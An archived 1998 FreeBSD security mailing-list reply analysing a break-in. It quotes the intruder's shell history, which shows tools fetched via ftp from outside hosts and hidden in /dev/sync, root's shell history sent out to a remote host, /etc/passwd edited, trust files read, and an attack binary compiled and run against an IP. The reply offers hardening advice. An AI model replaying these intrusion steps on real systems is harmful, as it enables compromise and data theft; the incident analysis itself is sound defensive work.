Date: Thu, 27 Aug 1998 01:31:03 -0400 (EDT) From: "Craig H. Rowland" <crowland@psionic.com> To: Wilson MacGyver <macgyver@cylatech.com> Cc: security@FreeBSD.ORG Subject: Re: post breakin log Message-ID: <Pine.LNX.3.96.980827010411.2527A-100000@dolemite> In-Reply-To: <199808270538.BAA01341@armitage.cylatech.com>
next in thread | previous in thread | raw e-mail | index | archive | help
On Thu, 27 Aug 1998, Wilson MacGyver wrote: . . . > > has anyone seen some of these programs he ran/install/compile > before? > > Thanks, > Mac > He is mainly pulling in tools from remote hosts to further leverage his access, he is also running irc probably a sniffer and other typical non-sense. You should go through your log and write to the admin of each site listed to tell them about the problem so they can get rid of the intruder as well. As an example you can look at his command: ftp worldnetworks.net Where he first went to get his bag-o-tricks to run on your box. Logging into this server you can see that it is horribly mis-configured with FTP as the owner of the root directory. The .forward file was modified to mail the passwd list off to another account, etc. I'm sure if you go down the list you'll find they are all compromised. This is pretty standard :( The /dev/sync directory is just a hiding place for his tools. Other common places include spool directories, user home directories, etc. It's pretty hard to tell where things will be placed once inside. The best thing to do is re-load your system (which it sounds like you've done). You'll also want to do some other things such as: 1) Ensure users don't re-use old passwords. 2) Keep up-to-date with security problems. 3) Shut off unneeded services. 4) Monitor your logs for suspicious activity. 5) Don't allow users shell access unless they need it. 6) Keep off-line cryptographically secure checksums of key system binaries and config files. 7) Limit access to system daemons to IP addresses that need them with some type of "wrapper" or IP filtering mechanism. 8) Shut off your r-services (rsh, rlogin) if you don't need them. It looks like he probably used a lot of transitive trusts (.rhosts, hosts.equiv) to move around your network. 9) Too many more to list here. :) Shameless plug: I wrote a quick page a while back describing some of the more common attacks I've seen against hosts. It may contain some useful information for you: http://www.psionic.com/papers/attacks.html -- Craig > ---------------------- > > cd /tmp > telnet localhost 110 > ls -la > mv popper /usr/local/libexec/ > telnet localhost 110 > rm -rf free* > cd /games > ls -la > cd /dev > mkdir sync > cd sync > ftp worldnetworks.net > tar -xvf b.tar > rm -rf b.tar > cd bnc* > make > pico bnc.conf > mv bnc .. > cd .. > rm -rf bnc2* > vi bnc.conf > mv bnc pine > pine > exit > ls > cd /usr > ld > ls > cd .. > ls > cd root > ls -la > cd .. > locate bnc > locate irc > ls > locate tcp.log > cd /dev > ls > tail ptyr > tail ptyr1 > tail ptyp1 > tail ptyq1 > uname -a > exit > ls > cd etc > pico passwd > tail passwd > cd usr > cd /usr > ls > cd sup > ls > ls -la > cd src-all > ls > locate fbsdrootkit.tgz > locate fb.tgz > locate bnc.conf > cd .. > cd local > ls > cd .. > ls > cd /dev > ls -la > tail zero > tail /root/.bash_history > cd /root > cp .bash_history h > ftp bugs.mc.duke.edu > rm h > cd /dev > cd sync > ls > tail bnc.conf > exit > cd /usr/games > ls > cd hack > cd hide > ls > ls -la > ./hack > ls > cd /dev/sync > ls > ls -la > cd .. > tail ptya > locate irc > irc > BitchX > cd sync > ls > tail bnc.conf > telnet linuxppc.org > telnet irc.686.org > telnet irc686.com > telnet irc.686.com > who > telnet onyx.eng.sunysb.edu > telnet irc.686.com 90210 > telnet declan.bio.columbia.edu > telnet sleepy.uncg.edu > telnet sleepy.uncg.edu > telnet desoto.coosavalley.net > telnet 209.16.220.8 > telnet ramsis.spd.louisville.edu > telnet nuptse.knowledge2000.com > telnet ramses.spd.louisville.edu > telnet cc607580-a.hwrd1.md.home.com > pico > tail /root/.bash_history > ls > uptime > cd root > ls > tail .rhosts > tail /etc/hosts.equiv > cd /var/named > cd var > ls > cd /var > ls > telnet STARLIGHT1.DIGITALSTARLIGHT.COM > uname -a > telnet www.cylatech.com > rlogin -l ui8765 www.cylatech.com > ls > uname -a > ftp bugs.mc.duke.edu > gcc > gcc -o bmb bmb.c > ls > ./bmb 207.153.39.89 23 > ls > rm bmb* > ls > exit > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.LNX.3.96.980827010411.2527A-100000>